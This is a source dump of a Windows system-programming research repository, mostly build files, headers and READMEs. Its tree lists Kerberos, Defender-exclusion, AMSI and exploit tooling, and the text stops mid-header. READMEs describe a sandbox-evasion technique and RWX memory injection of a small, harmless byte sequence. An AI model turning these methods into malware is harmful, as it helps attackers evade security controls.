├── README.md
├── DIA
├── tools
│ ├── symsrv.dll
│ └── msdia140.dll
├── inc
│ ├── msdia
│ │ ├── lib
│ │ │ ├── diaguids.lib
│ │ │ └── amd64
│ │ │ │ └── diaguids.lib
│ │ └── include
│ │ │ └── diacreate.h
│ ├── dirutil.h
│ ├── callback.h
│ └── interface.h
├── CMakeLists.txt
└── src
│ ├── main.c
│ ├── dirutil.c
│ ├── callback.c
│ └── interface.c
├── Task Scheduler
├── README.md
└── enumerate_tasks.cpp
├── Fusion
├── FindAssembly
│ ├── app.config
│ ├── Win32
│ │ ├── Macros.cs
│ │ └── Functions.cs
│ ├── FindAssembly.sln
│ ├── Properties
│ │ └── AssemblyInfo.cs
│ ├── Fusion
│ │ ├── IAssemblyEnum.cs
│ │ ├── IAssemblyCacheItem.cs
│ │ ├── IAssemblyCache.cs
│ │ └── IAssemblyName.cs
│ ├── Program.cs
│ └── FindAssembly.csproj
└── ListAssemblies
│ ├── gacutil.h
│ └── main.c
├── Cryptography
└── AES CNG
│ ├── source
│ ├── nthelpers.h
│ ├── Util.h
│ ├── Util.cpp
│ ├── AESCrypt.vcxproj.filters
│ ├── AES.h
│ ├── Base64.h
│ ├── AESCrypt.sln
│ ├── Main.cpp
│ ├── AESCrypt.vcxproj
│ └── AES.cpp
│ └── README.md
├── Power Management
├── README.md
└── deus_somnum_user32.cpp
├── RWX
├── PInvoke
│ ├── PInvoke
│ │ └── PInvoke.csproj
│ └── PInvoke.sln
├── JITCompilation
│ ├── JITCompilation
│ │ └── JITCompilation.csproj
│ └── JITCompilation.sln
├── MMF
│ ├── MMF
│ │ ├── MMF.csproj
│ │ └── Program.cs
│ └── MMF.sln
└── README.md
├── Process
└── GetProcessEnvironmentBlock
│ ├── GetProcessEnvironmentBlock
│ ├── GetProcessEnvironmentBlock.csproj
│ └── Program.cs
│ └── GetProcessEnvironmentBlock.sln
├── Defender
└── ExclusionLists
│ ├── CMakeLists.txt
│ ├── main.c
│ ├── inc
│ └── defender.h
│ └── src
│ └── defender.c
├── Office
└── Outlook
│ ├── CMakeLists.txt
│ ├── src
│ └── main.c
│ └── inc
│ └── outlook.h
├── Kerberos
├── List
│ └── CMakeLists.txt
├── GetTicket
│ └── CMakeLists.txt
├── Purge
│ ├── CMakeLists.txt
│ └── src
│ │ └── main.c
└── AskTGT
│ ├── CMakeLists.txt
│ ├── socket.h
│ ├── socket.c
│ └── main.c
├── CMakeLists.txt
├── CMakeSettings.json
├── Secure Enclave
└── VBS
│ └── bsod.c
├── Object Manager
├── List Handles
│ └── ntstructs.h
└── List Objects
│ ├── ntstructs.h
│ └── main.c
├── WinDBG
└── exploit86.js
├── AppLocker
└── List Policies
│ ├── main.c
│ └── interfaces.h
├── .gitignore
└── AMSI
└── amsi_scanner.c
/README.md:
--------------------------------------------------------------------------------
1 | ## Windows System Programming Experiments ##
2 |
3 |
--------------------------------------------------------------------------------
/DIA/tools/symsrv.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/am0nsec/wspe/HEAD/DIA/tools/symsrv.dll
--------------------------------------------------------------------------------
/DIA/tools/msdia140.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/am0nsec/wspe/HEAD/DIA/tools/msdia140.dll
--------------------------------------------------------------------------------
/Task Scheduler/README.md:
--------------------------------------------------------------------------------
1 | Resource: https://docs.microsoft.com/en-us/windows/win32/api/_taskschd/
2 |
--------------------------------------------------------------------------------
/DIA/inc/msdia/lib/diaguids.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/am0nsec/wspe/HEAD/DIA/inc/msdia/lib/diaguids.lib
--------------------------------------------------------------------------------
/DIA/inc/msdia/lib/amd64/diaguids.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/am0nsec/wspe/HEAD/DIA/inc/msdia/lib/amd64/diaguids.lib
--------------------------------------------------------------------------------
/Fusion/FindAssembly/app.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/Cryptography/AES CNG/source/nthelpers.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
3 | #define STATUS_UNSUCCESSFUL 0xC0000001
4 | #define STATUS_INVALID_BUFFER_SIZE 0xC0000206
--------------------------------------------------------------------------------
/Power Management/README.md:
--------------------------------------------------------------------------------
1 | # Deus Somnum
2 | Source code for the Deus Somnum armouring technique against sandboxs.
3 |
4 | Further information can be found here: https://vxug.fakedoma.in/papers/Deus%20Somnum.pdf
5 |
--------------------------------------------------------------------------------
/RWX/PInvoke/PInvoke/PInvoke.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | net5.0
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/RWX/JITCompilation/JITCompilation/JITCompilation.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | net5.0
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/Fusion/FindAssembly/Win32/Macros.cs:
--------------------------------------------------------------------------------
1 |
2 | namespace FindAssembly.Win32 {
3 | public static class Macros {
4 |
5 | public static bool SUCCEEDED(uint hr) => hr >= S_OK;
6 |
7 | public static uint S_OK = 0x00000000;
8 | public static uint E_FAIL = 0x80004005;
9 |
10 | }
11 | }
12 |
--------------------------------------------------------------------------------
/RWX/MMF/MMF/MMF.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | net5.0
6 |
7 |
8 |
9 | false
10 |
11 |
12 |
13 |
--------------------------------------------------------------------------------
/Cryptography/AES CNG/README.md:
--------------------------------------------------------------------------------
1 | ## AESCrypt ##
2 |
3 | This repository provide a simple example of how to use the Windows Cryptography API Next Generation to encrypt and decrypt a string with AES algorithm.
4 |
5 | The Microsoft documentation can be found here: https://docs.microsoft.com/en-us/windows/win32/seccng/cng-portal
6 |
7 |
8 |
9 |
10 | [am0nsec](https://twitter.com/am0nsec) - cum lux abest, tenebrae vincunt
11 |
--------------------------------------------------------------------------------
/Process/GetProcessEnvironmentBlock/GetProcessEnvironmentBlock/GetProcessEnvironmentBlock.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | netcoreapp3.1
6 |
7 |
8 |
9 | true
10 |
11 |
12 |
13 |
--------------------------------------------------------------------------------
/Defender/ExclusionLists/CMakeLists.txt:
--------------------------------------------------------------------------------
1 | # @file CMakeLists.txt
2 | # @author Paul L. (@am0nsec)
3 | # @version 1.0
4 | # @brief List Windows Defender Exclusion Lists
5 | # @details
6 | # @link https://github.com/am0nsec/wspe
7 | # @copyright This project has been released under the GNU Public License v3 license.
8 |
9 | include_directories(inc)
10 |
11 | add_executable(defender-exclusion-list
12 | "main.c"
13 | "src/defender.c"
14 | )
--------------------------------------------------------------------------------
/Office/Outlook/CMakeLists.txt:
--------------------------------------------------------------------------------
1 | # @file CMakeLists.txt
2 | # @data 10/03/2021
3 | # @author Paul L. (@am0nsec)
4 | # @version 1.0
5 | # @brief Office Outlook CMake configuration file.
6 | # @details
7 | # @link https://github.com/am0nsec/wspe
8 | # @copyright This project has been released under the GNU Public License v3 license.
9 |
10 | include_directories(inc)
11 | add_executable(outlook_util
12 | "src/main.c"
13 | "src/outlook.c"
14 | )
--------------------------------------------------------------------------------
/Kerberos/List/CMakeLists.txt:
--------------------------------------------------------------------------------
1 | # @file CMakeLists.txt
2 | # @author Paul L. (@am0nsec)
3 | # @version 1.0
4 | # @brief Kerberos list tickets.
5 | # @details
6 | # @link https://github.com/am0nsec/wspe
7 | # @copyright This project has been released under the GNU Public License v3 license.
8 |
9 | add_executable(pklist
10 | "src/main.c"
11 | )
12 |
13 | set_property(TARGET pklist
14 | PROPERTY
15 | MSVC_RUNTIME_LIBRARY "MultiThreaded$<$:Rlease>"
16 | )
--------------------------------------------------------------------------------
/Kerberos/GetTicket/CMakeLists.txt:
--------------------------------------------------------------------------------
1 | # @file CMakeLists.txt
2 | # @author Paul L. (@am0nsec)
3 | # @version 1.0
4 | # @brief Kerberos get user TGT.
5 | # @details
6 | # @link https://github.com/am0nsec/wspe
7 | # @copyright This project has been released under the GNU Public License v3 license.
8 |
9 | add_executable(pktgt
10 | "src/main.c"
11 | )
12 |
13 | set_property(TARGET pktgt
14 | PROPERTY
15 | MSVC_RUNTIME_LIBRARY "MultiThreaded$<$:Rlease>"
16 | )
--------------------------------------------------------------------------------
/Kerberos/Purge/CMakeLists.txt:
--------------------------------------------------------------------------------
1 | # @file CMakeLists.txt
2 | # @author Paul L. (@am0nsec)
3 | # @version 1.0
4 | # @brief Kerberos purge tickets.
5 | # @details
6 | # @link https://github.com/am0nsec/wspe
7 | # @copyright This project has been released under the GNU Public License v3 license.
8 |
9 | add_executable(pkpurge
10 | "src/main.c"
11 | )
12 |
13 | set_property(TARGET pkpurge
14 | PROPERTY
15 | MSVC_RUNTIME_LIBRARY "MultiThreaded$<$:Rlease>"
16 | )
--------------------------------------------------------------------------------
/RWX/README.md:
--------------------------------------------------------------------------------
1 | ## Read (R), Writable (W), Executable (X) ##
2 |
3 | Collection of .NET Core C# code to generate Read, Writable and Executable memory region.
4 |
5 | In each examples, the following code is injected and executed:
6 | ```csharp
7 | Span asm = stackalloc byte[10] {
8 | 0x65, 0x48, 0x8B, 0x04, 0x25, 0x60, 0x00, 0x00, 0x00, // MOV RAX, GS:[0x60]
9 | 0xC3 // RET
10 | };
11 | ```
12 |
13 | This assembly code is used to the the address of the Process Environment Block (PEB) structure.
14 |
--------------------------------------------------------------------------------
/Kerberos/AskTGT/CMakeLists.txt:
--------------------------------------------------------------------------------
1 | # @file CMakeLists.txt
2 | # @author Paul L. (@am0nsec)
3 | # @version 1.0
4 | # @brief Kerberos request kerberos TGT.
5 | # @details
6 | # @link https://github.com/am0nsec/wspe
7 | # @copyright This project has been released under the GNU Public License v3 license.
8 |
9 | add_executable(pkasktgt
10 | "main.c"
11 | "kerberos.c"
12 | "socket.c"
13 |
14 | "kerberos.h"
15 | "socket.h"
16 | )
17 |
18 | set_property(TARGET pkasktgt
19 | PROPERTY
20 | MSVC_RUNTIME_LIBRARY "MultiThreaded$<$:Rlease>"
21 | )
--------------------------------------------------------------------------------
/Cryptography/AES CNG/source/Util.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #ifndef WIN32_LEAN_AND_MEAN
3 | #define WIN32_LEAN_AND_MEAN
4 | #endif
5 | #ifndef NOCOMM
6 | #define NOCOMM
7 | #endif
8 | #include
9 |
10 | namespace CNG {
11 | class Util {
12 | public:
13 | static VOID WriteSuccessMessage(std::wstring wsBuffer);
14 | static VOID WriteSuccessMessage(std::wstring wsBuffer, int tabs);
15 |
16 | static VOID WriteErrorMessage(std::wstring wsBuffer);
17 | static VOID WriteErrorMessage(std::wstring wsBuffer, int tabs);
18 |
19 | static VOID WriteInfoMessage(std::wstring wsBuffer);
20 | static VOID WriteInfoMessage(std::wstring wsBuffer, int tabs);
21 |
22 | static VOID WriteMessage(std::wstring wsBuffer);
23 | };
24 | }
--------------------------------------------------------------------------------
/Fusion/FindAssembly/Win32/Functions.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using FindAssembly.Fusion;
3 | using System.Runtime.InteropServices;
4 |
5 | namespace FindAssembly.Win32 {
6 | internal class Functions {
7 |
8 | [DllImport("fusion.dll", CharSet = CharSet.Auto)]
9 | [PreserveSig]
10 | public static extern uint CreateAssemblyEnum(
11 | out IAssemblyEnum ppEnum,
12 | IntPtr pUnkReserved,
13 | IAssemblyName pName,
14 | ASM_CACHE_FLAGS dwFlags,
15 | IntPtr pvReserved
16 | );
17 |
18 | [DllImport("fusion.dll", CharSet = CharSet.Auto)]
19 | [PreserveSig]
20 | public static extern uint CreateAssemblyCache(
21 | out IAssemblyCache ppAsmCache,
22 | uint dwReserved
23 | );
24 | }
25 | }
26 |
--------------------------------------------------------------------------------
/CMakeLists.txt:
--------------------------------------------------------------------------------
1 | # @file CMakeLists.txt
2 | # @data 12/02/2021
3 | # @author Paul L. (@am0nsec)
4 | # @version 1.0
5 | # @brief WSPE CMake configuration file.
6 | cmake_minimum_required(VERSION 3.16)
7 |
8 | # You kids get off my lawn!
9 | if (NOT ${CMAKE_SYSTEM_NAME} STREQUAL "Windows")
10 | message(FATAL_ERROR "You kids get off my lawn with Linux ...")
11 | endif()
12 |
13 |
14 | # Dummy project
15 | project(wspe VERSION 1.0 LANGUAGES C)
16 |
17 | # Kerberos
18 | add_subdirectory(Kerberos/List)
19 | add_subdirectory(Kerberos/Purge)
20 | add_subdirectory(Kerberos/GetTicket)
21 | add_subdirectory(Kerberos/AskTGT)
22 |
23 | # Office
24 | add_subdirectory(Office/outlook)
25 |
26 | # Windows Defender
27 | add_subdirectory(Defender/ExclusionLists)
28 |
29 | # Microsoft Debug Interface Access (DIA)
30 | add_subdirectory(DIA)
31 |
--------------------------------------------------------------------------------
/CMakeSettings.json:
--------------------------------------------------------------------------------
1 | {
2 | "configurations": [
3 | {
4 | "name": "x64-Debug",
5 | "generator": "Ninja",
6 | "configurationType": "Debug",
7 | "inheritEnvironments": [ "msvc_x64_x64" ],
8 | "buildRoot": "${projectDir}\\out\\build\\${name}",
9 | "installRoot": "${projectDir}\\out\\install\\${name}",
10 | "cmakeCommandArgs": "",
11 | "buildCommandArgs": "",
12 | "ctestCommandArgs": ""
13 | },
14 | {
15 | "name": "x64-Release",
16 | "generator": "Ninja",
17 | "configurationType": "RelWithDebInfo",
18 | "buildRoot": "${projectDir}\\out\\build\\${name}",
19 | "installRoot": "${projectDir}\\out\\install\\${name}",
20 | "cmakeCommandArgs": "",
21 | "buildCommandArgs": "",
22 | "ctestCommandArgs": "",
23 | "inheritEnvironments": [ "msvc_x64_x64" ],
24 | "variables": []
25 | }
26 | ]
27 | }
--------------------------------------------------------------------------------
/Kerberos/AskTGT/socket.h:
--------------------------------------------------------------------------------
1 |
2 | #ifndef __SOCKET_H_GUARD__
3 | #define __SOCKET_H_GUARD__
4 |
5 | #define _WINSOCK_DEPRECATED_NO_WARNINGS
6 | #include
7 | #include
8 | #pragma comment(lib, "WS2_32.lib")
9 |
10 | #define STATUS_SUCCESS 0x00000000
11 | #define STATUS_UNSUCCESSFUL 0xC0000001
12 | #define STATUS_PRIVILEGE_NOT_HELD 0xC0000061
13 | #define STATUS_NOT_SUPPORTED 0xC00000BB
14 | #define STATUS_NO_TOKEN 0xC000007C
15 |
16 | #ifndef NT_ERROR
17 | #define NT_ERROR(Status) ((((ULONG)(Status)) >> 30) == 3)
18 | #endif
19 |
20 | #ifndef NT_SUCCESS
21 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
22 | #endif
23 |
24 | #define XLATE_UINT32(disp, x) (((ULONG32)disp & ((ULONG32)0xFF << (8 *(3 - x)))) >> (8 * (3 - x)))
25 |
26 | NTSTATUS SockSendKerberosASRequest(
27 | _In_ LPSTR Address,
28 | _In_ PBYTE Request,
29 | _In_ INT32 RequestSize,
30 | _Out_ PBYTE* Response,
31 | _Out_ INT32* ResponseSize
32 | );
33 |
34 | #endif // !__SOCKET_H_GUARD__
35 |
--------------------------------------------------------------------------------
/DIA/inc/dirutil.h:
--------------------------------------------------------------------------------
1 | /*+================================================================================================
2 | Module Name: dirutil.h
3 | Author : Paul L. (@am0nsec)
4 | Origin : https://github.com/am0nsec/wspe/
5 | Copyright : This project has been released under the GNU Public License v3 license.
6 |
7 | Abstract:
8 | Windows Directory utility code.
9 | Used to change directory to the "PDB" folder and get the correct symbol server search path.
10 |
11 | ================================================================================================+*/
12 |
13 | #ifndef __DIA_DIRUTIL_H_GUARD__
14 | #define __DIA_DIRUTIL_H_GUARD__
15 |
16 | #include
17 |
18 | _Must_inspect_result_
19 | HRESULT ChangeDirectory(
20 | _In_ PWCHAR Directory,
21 | _In_ DWORD Size
22 | );
23 |
24 | _Must_inspect_result_
25 | PWCHAR GetSymSrvSearchPath(
26 | VOID
27 | );
28 |
29 | _Must_inspect_result_
30 | PWCHAR GetMsdiaModulePath(
31 | VOID
32 | );
33 |
34 | _Must_inspect_result_
35 | HRESULT ResetDirectory(
36 | VOID
37 | );
38 |
39 | #endif // !__DIA_DIRUTIL_H_GUARD__
40 |
--------------------------------------------------------------------------------
/RWX/MMF/MMF.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30128.36
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "MMF", "MMF\MMF.csproj", "{79870090-A133-4F99-8008-78EC172ABEB0}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {79870090-A133-4F99-8008-78EC172ABEB0}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {79870090-A133-4F99-8008-78EC172ABEB0}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {79870090-A133-4F99-8008-78EC172ABEB0}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {79870090-A133-4F99-8008-78EC172ABEB0}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {78449DF1-30E9-4526-A035-BDF9EA54B441}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/Fusion/FindAssembly/FindAssembly.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30128.36
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "FindAssembly", "FindAssembly.csproj", "{3B49B239-4005-4F25-9E39-522C61B980BE}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {3B49B239-4005-4F25-9E39-522C61B980BE}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {3B49B239-4005-4F25-9E39-522C61B980BE}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {3B49B239-4005-4F25-9E39-522C61B980BE}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {3B49B239-4005-4F25-9E39-522C61B980BE}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {6C916D44-E4CC-47F6-B49F-E7EB90122027}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/RWX/PInvoke/PInvoke.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30128.36
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PInvoke", "PInvoke\PInvoke.csproj", "{79A6FE64-B3B7-4F48-B7ED-D5D4402802A4}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {79A6FE64-B3B7-4F48-B7ED-D5D4402802A4}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {79A6FE64-B3B7-4F48-B7ED-D5D4402802A4}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {79A6FE64-B3B7-4F48-B7ED-D5D4402802A4}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {79A6FE64-B3B7-4F48-B7ED-D5D4402802A4}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {A4E99308-40A3-4E3A-ABB0-52E5C0B00577}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/DIA/CMakeLists.txt:
--------------------------------------------------------------------------------
1 | # @file CMakeLists.txt
2 | # @data 13/06/2022
3 | # @author Paul L. (@am0nsec)
4 | # @version 1.0
5 | # @brief Microsoft Debug Interface Access (DIA) CMake configuration file.
6 | # @details
7 | # @link https://github.com/am0nsec/wspe
8 | # @copyright This project has been released under the GNU Public License v3 license.
9 |
10 | include_directories(inc)
11 |
12 | add_executable(dia-dump
13 | "src/main.c"
14 | "src/callback.c"
15 | "src/interface.c"
16 | "src/dirutil.c"
17 | )
18 |
19 | # Add all post-build commands
20 | add_custom_command(
21 | TARGET dia-dump
22 | POST_BUILD
23 | COMMAND ${CMAKE_COMMAND} -E echo "Start post-build commands"
24 |
25 | # Make all the directories
26 | COMMAND ${CMAKE_COMMAND} -E make_directory "${CMAKE_BINARY_DIR}/DIA/pdb"
27 | COMMAND ${CMAKE_COMMAND} -E make_directory "${CMAKE_BINARY_DIR}/DIA/msdia"
28 |
29 | # Copy binaries required
30 | COMMAND ${CMAKE_COMMAND} -E copy "${CMAKE_SOURCE_DIR}/DIA/tools/symsrv.dll" "${CMAKE_BINARY_DIR}/DIA/pdb/"
31 | COMMAND ${CMAKE_COMMAND} -E copy "${CMAKE_SOURCE_DIR}/DIA/tools/msdia140.dll" "${CMAKE_BINARY_DIR}/DIA/msdia/"
32 |
33 | # End
34 | COMMAND ${CMAKE_COMMAND} -E echo "Start post-build commands ... OK"
35 | )
36 |
--------------------------------------------------------------------------------
/RWX/JITCompilation/JITCompilation.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30128.36
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "JITCompilation", "JITCompilation\JITCompilation.csproj", "{3254121C-238B-4760-8693-CEE605432E7C}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {3254121C-238B-4760-8693-CEE605432E7C}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {3254121C-238B-4760-8693-CEE605432E7C}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {3254121C-238B-4760-8693-CEE605432E7C}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {3254121C-238B-4760-8693-CEE605432E7C}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {CC70A5F2-9D05-4522-A82A-32FD74ABA51F}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/Process/GetProcessEnvironmentBlock/GetProcessEnvironmentBlock.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30114.105
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "GetProcessEnvironmentBlock", "GetProcessEnvironmentBlock\GetProcessEnvironmentBlock.csproj", "{286BACF5-74CB-40F0-A1D2-EF443E07D0E0}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {286BACF5-74CB-40F0-A1D2-EF443E07D0E0}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {286BACF5-74CB-40F0-A1D2-EF443E07D0E0}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {286BACF5-74CB-40F0-A1D2-EF443E07D0E0}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {286BACF5-74CB-40F0-A1D2-EF443E07D0E0}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {D5BAD6FA-F1FA-40C6-A9D7-0DAD2E1F60CC}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/DIA/inc/msdia/include/diacreate.h:
--------------------------------------------------------------------------------
1 | // diacreate.h - creation helper functions for DIA initialization
2 | //-----------------------------------------------------------------
3 | //
4 | // Copyright Microsoft Corporation. All Rights Reserved.
5 | //
6 | //---------------------------------------------------------------
7 | #ifndef _DIACREATE_H_
8 | #define _DIACREATE_H_
9 |
10 | //
11 | // Create a dia data source object from the dia dll (by dll name - does not access the registry).
12 | //
13 |
14 | HRESULT STDMETHODCALLTYPE NoRegCoCreate( const __wchar_t *dllName,
15 | REFCLSID rclsid,
16 | REFIID riid,
17 | void **ppv);
18 |
19 | #ifndef _NATIVE_WCHAR_T_DEFINED
20 | #ifdef __cplusplus
21 |
22 | HRESULT STDMETHODCALLTYPE NoRegCoCreate( const wchar_t *dllName,
23 | REFCLSID rclsid,
24 | REFIID riid,
25 | void **ppv)
26 | {
27 | return NoRegCoCreate( (const __wchar_t *)dllName, rclsid, riid, ppv );
28 | }
29 |
30 | #endif
31 | #endif
32 |
33 |
34 |
35 | //
36 | // Create a dia data source object from the dia dll (looks up the class id in the registry).
37 | //
38 | HRESULT STDMETHODCALLTYPE NoOleCoCreate( REFCLSID rclsid,
39 | REFIID riid,
40 | void **ppv);
41 |
42 | #endif
43 |
--------------------------------------------------------------------------------
/Cryptography/AES CNG/source/Util.cpp:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #ifndef WIN32_LEAN_AND_MEAN
3 | #define WIN32_LEAN_AND_MEAN
4 | #endif
5 | #ifndef NOCOMM
6 | #define NOCOMM
7 | #endif
8 | #include
9 | #include
10 | #include "Util.h"
11 |
12 | namespace CNG {
13 | VOID WINAPI Util::WriteSuccessMessage(std::wstring wsBuffer) {
14 | std::wcout << L"[+] ";
15 | Util::WriteMessage(wsBuffer);
16 | }
17 |
18 | VOID WINAPI Util::WriteSuccessMessage(std::wstring wsBuffer, int tabs) {
19 | for (int i = 0; i <= tabs; i++)
20 | std::wcout << " ";
21 | std::wcout << L"[+] ";
22 | Util::WriteMessage(wsBuffer);
23 | }
24 |
25 | VOID WINAPI Util::WriteErrorMessage(std::wstring wsBuffer) {
26 | std::wcout << L"[-] ";
27 | Util::WriteMessage(wsBuffer);
28 | }
29 |
30 | VOID WINAPI Util::WriteErrorMessage(std::wstring wsBuffer, int tabs) {
31 | for (int i = 0; i <= tabs; i++)
32 | std::wcout << " ";
33 | std::wcout << L"[-] ";
34 | Util::WriteMessage(wsBuffer);
35 | }
36 |
37 | VOID WINAPI Util::WriteInfoMessage(std::wstring wsBuffer) {
38 | std::wcout << L"[>] ";
39 | Util::WriteMessage(wsBuffer);
40 | }
41 |
42 | VOID WINAPI Util::WriteInfoMessage(std::wstring wsBuffer, int tabs) {
43 | for (int i = 0; i <= tabs; i++)
44 | std::wcout << " ";
45 | std::wcout << L"[>] ";
46 | Util::WriteMessage(wsBuffer);
47 | }
48 |
49 | VOID WINAPI Util::WriteMessage(std::wstring wsBuffer) {
50 | std::wcout << wsBuffer;
51 | }
52 | }
--------------------------------------------------------------------------------
/DIA/inc/callback.h:
--------------------------------------------------------------------------------
1 | /*+================================================================================================
2 | Module Name: callback.h
3 | Author : Paul L. (@am0nsec)
4 | Origin : https://github.com/am0nsec/wspe/
5 | Copyright : This project has been released under the GNU Public License v3 license.
6 |
7 | Abstract:
8 | Abstraction of the Microsoft Debug Interface Access (DIA) SDK.
9 |
10 | In this case this module contains the code for the CCallback COM interface implementation when loading PDB from
11 | a PE EXE file.
12 |
13 | Documentation available at: https://docs.microsoft.com/en-us/visualstudio/debugger/debug-interface-access/debug-interface-access-sdk
14 | Most of the code is based on the Dia2Dump code sample shipped with the MS DIA SDK.
15 | ================================================================================================+*/
16 |
17 | #ifndef __DIA_CALLBACK_H_GUARD__
18 | #define __DIA_CALLBACK_H_GUARD__
19 |
20 | #include
21 |
22 | #include "msdia/include/dia2.h"
23 |
24 | typedef struct DiaCallback {
25 |
26 | // Virtual Table for the callback
27 | CONST_VTBL struct IDiaLoadCallback2* lpVtbl;
28 |
29 | // Reference counter for the AddRef/Release methods
30 | int m_nRefCount;
31 | } DiaCallback;
32 |
33 |
34 | HRESULT STDMETHODCALLTYPE
35 | _Must_inspect_result_
36 | _Success_(return == S_OK)
37 | DiaCallbackHelper(
38 | _In_ BOOLEAN Initialise,
39 | _Inout_ PVOID** Callback
